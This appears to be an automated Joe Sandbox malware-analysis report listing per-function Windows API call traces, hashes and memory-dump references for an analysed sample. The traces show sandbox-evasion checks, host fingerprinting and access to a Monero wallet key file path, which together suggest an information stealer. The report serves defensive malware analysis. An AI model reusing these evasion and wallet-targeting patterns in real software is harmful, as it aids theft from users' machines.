Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 4ec3e26d3afe9e2dcc56b68f29a5943a7103c4269d8da2a8385324895ae2bc13
Instruction ID: 41320245e7ed19c04646c5c044b80b09db13396a4cd2e2e355a2f14b3becf471
Opcode Fuzzy Hash: 4ec3e26d3afe9e2dcc56b68f29a5943a7103c4269d8da2a8385324895ae2bc13
Instruction Fuzzy Hash: DD014FB5A04608BBE701DBE4DD8DFA9B7BCEB48701F104058FA859B2D0D7B1A9448B51

Function 00107720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00107734
RtlAllocateHeap.NTDLL(00000000), ref: 0010773B
RegOpenKeyExA.KERNEL32(80000002,00CCC2A0,00000000,00020119,001076B9), ref: 0010775B
RegQueryValueExA.KERNEL32(001076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0010777A
RegCloseKey.ADVAPI32(001076B9), ref: 00107784

Strings

CurrentBuildNumber, xrefs: 00107771

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 1590404b19a4530533f0f9f95a77c51bc1ee3372b863d303ea9c16e7368694f5
Instruction ID: 99355f172c093a590a9cc10880387318130bd075cf0d564df4d02b2d350d230a
Opcode Fuzzy Hash: 1590404b19a4530533f0f9f95a77c51bc1ee3372b863d303ea9c16e7368694f5
Instruction Fuzzy Hash: 500167B5E40308BBD701DBE4DC89FAEB7BCEB48700F004158FA45A7281DBB055408B51

Function 001069F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD21D0), ref: 001098A1
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD2320), ref: 001098BA
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD2458), ref: 001098D2
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD21E8), ref: 001098EA
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD23F8), ref: 00109903
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD8FD0), ref: 0010991B
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CC5770), ref: 00109933
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CC5890), ref: 0010994C
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD2410), ref: 00109964
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD2248), ref: 0010997C
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD2200), ref: 00109995
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD2218), ref: 001099AD
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CC58B0), ref: 001099C5
Part of subcall function 00109860: GetProcAddress.KERNEL32(74DD0000,00CD2440), ref: 001099DE

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 000F11D0: ExitProcess.KERNEL32 ref: 000F1211

Part of subcall function 000F1160: GetSystemInfo.KERNEL32(?), ref: 000F116A
Part of subcall function 000F1160: ExitProcess.KERNEL32 ref: 000F117E

Part of subcall function 000F1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000F112B
Part of subcall function 000F1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 000F1132
Part of subcall function 000F1110: ExitProcess.KERNEL32 ref: 000F1143

Part of subcall function 000F1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000F123E
Part of subcall function 000F1220: __aulldiv.LIBCMT ref: 000F1258
Part of subcall function 000F1220: __aulldiv.LIBCMT ref: 000F1266
Part of subcall function 000F1220: ExitProcess.KERNEL32 ref: 000F1294

Part of subcall function 00106770: GetUserDefaultLangID.KERNEL32 ref: 00106774

Part of subcall function 000F1190: ExitProcess.KERNEL32 ref: 000F11C6

Part of subcall function 00107850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000F11B7), ref: 00107880
Part of subcall function 00107850: RtlAllocateHeap.NTDLL(00000000), ref: 00107887
Part of subcall function 00107850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0010789F

Part of subcall function 001078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00107910
Part of subcall function 001078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00107917
Part of subcall function 001078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0010792F

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CD8E60,?,0011110C,?,00000000,?,00111110,?,00000000,00110AEF), ref: 00106ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00106AE8
CloseHandle.KERNEL32(00000000), ref: 00106AF9
Sleep.KERNEL32(00001770), ref: 00106B04
CloseHandle.KERNEL32(?,00000000,?,00CD8E60,?,0011110C,?,00000000,?,00111110,?,00000000,00110AEF), ref: 00106B1A
ExitProcess.KERNEL32 ref: 00106B22

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 48e0908115786f4708b62d85acd3ea15b13ebe6adb509750ce4c213c2acfd809
Instruction ID: faee5ace661453ca697b9ddc1aa4a9e22126faddaf14e2df4764bd645f162d27
Opcode Fuzzy Hash: 48e0908115786f4708b62d85acd3ea15b13ebe6adb509750ce4c213c2acfd809
Instruction Fuzzy Hash: 4A311E71E40208AADB05F7F0DC56BFE7778AF24300F904519F292A61D2DFB06945C6A2

Function 000F99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000F99EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 000F9A11
LocalAlloc.KERNEL32(00000040,?), ref: 000F9A31
ReadFile.KERNEL32(000000FF,?,00000000,000F148F,00000000), ref: 000F9A5A
LocalFree.KERNEL32(000F148F), ref: 000F9A90
CloseHandle.KERNEL32(000000FF), ref: 000F9A9A

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: e14b60c18c0e098d63e434c6c5fff30c20983100100b46001c5de59b453442b5
Instruction ID: 92a7513418a21a03b7cd7eb065d48e4595465a7468640e0fea973913d806caf6
Opcode Fuzzy Hash: e14b60c18c0e098d63e434c6c5fff30c20983100100b46001c5de59b453442b5
Instruction Fuzzy Hash: 9A3109B4A0020DEFDB14CF94C985BAE77F9FF48340F108158E911A7290D778AA41DFA2

Function 00104780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00CDE538), ref: 001047DB

Part of subcall function 00108DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00108E0B

lstrcat.KERNEL32(?,00000000), ref: 00104801
lstrcat.KERNEL32(?,?), ref: 00104820
lstrcat.KERNEL32(?,?), ref: 00104834
lstrcat.KERNEL32(?,00CCBAC0), ref: 00104847
lstrcat.KERNEL32(?,?), ref: 0010485B
lstrcat.KERNEL32(?,00CDDC80), ref: 0010486F

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 00108D90: GetFileAttributesA.KERNEL32(00000000,?,000F1B54,?,?,0011564C,?,?,00110E1F), ref: 00108D9F

Part of subcall function 00104570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00104580
Part of subcall function 00104570: RtlAllocateHeap.NTDLL(00000000), ref: 00104587
Part of subcall function 00104570: wsprintfA.USER32 ref: 001045A6
Part of subcall function 00104570: FindFirstFileA.KERNEL32(?,?), ref: 001045BD

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 675340018ac7f933f00bb16a8c0889faef076ac21548ee1532186c1122ce768b
Instruction ID: afefe5cedc29d2bb8dd8aca4427036e5e52d9487d80a9bdce83733fa4f565e3c
Opcode Fuzzy Hash: 675340018ac7f933f00bb16a8c0889faef076ac21548ee1532186c1122ce768b
Instruction Fuzzy Hash: ED315FB2900618A7CB11FBB0DCC5EE9737CAB68704F404589B3D9960C1EFB5D7898B95

Function 000F1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000F123E
__aulldiv.LIBCMT ref: 000F1258
__aulldiv.LIBCMT ref: 000F1266
ExitProcess.KERNEL32 ref: 000F1294

Strings

@, xrefs: 000F1233

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 7b838904352cc2f3e46a7f527ff8b26daffa7201a3ea6147dfe47be7ad654086
Instruction ID: 0eae71f17cfb4f0a6e3132a7bb136bd71953ef25ef254b531f264f36e842c003
Opcode Fuzzy Hash: 7b838904352cc2f3e46a7f527ff8b26daffa7201a3ea6147dfe47be7ad654086
Instruction Fuzzy Hash: 69016DB0D4430CFAEB50EBE0DC89BEEBBB8AB14705F208048F705B62C0D7B455419799

Function 001040B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00CDDC40,00000000,00020119,?), ref: 001040F4
RegQueryValueExA.ADVAPI32(?,00CDE400,00000000,00000000,00000000,000000FF), ref: 00104118
RegCloseKey.ADVAPI32(?), ref: 00104122
lstrcat.KERNEL32(?,00000000), ref: 00104147
lstrcat.KERNEL32(?,00CDE418), ref: 0010415B

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
